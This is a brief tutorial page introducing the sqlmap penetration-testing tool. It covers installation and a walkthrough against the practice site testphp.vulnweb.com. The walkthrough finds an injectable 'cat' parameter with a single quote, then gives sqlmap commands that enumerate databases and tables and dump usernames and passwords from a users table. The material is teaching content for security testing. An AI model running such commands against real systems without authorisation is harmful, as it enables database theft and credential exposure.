icon Book Free Consultation

SQLMAP

Image

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. 

https://github.com/sqlmapproject/sqlmap 

Installation

To install SQLmap we can pull it  from above github link or we can use below command 

  •  apt-get install sqlmap 

It comes installed by default in kali linux... 

To use sqlmap to exploit SQLi flaw 

       1. First we need to find a SQLi vulnerable parameter in a web app 

           testphp.vulnweb.com/listproducts.php?cat=2' 

           Addind a single quote showed this site parameter cat is vulnerable 

       2.  We can launch sqlmap to dump Databases, tables and cloumns and Data from the vulnerable site 

            Note: Using Sqlmap for exploitation without proper permission is illegal  

            -u url -p parameter  

            --dbs databases 

            --tables to get tables 

            --columns to get columns 

Sqlmap may take a lot of time as it will try lot of sqli techniques based on target SQL server (mysql, mssql, oracle etc.,) 

Once we got DB, we can fetch tables and columns 

  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 -p cat -D acuart --tables 

Lets dump user and pass info from users table 

  • sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 -p cat -D acuart -T users -C uname,pass --dump 

In this way SQLmap can be used to exploit blind SQLi vulnerability also.. 

Demo

Lock image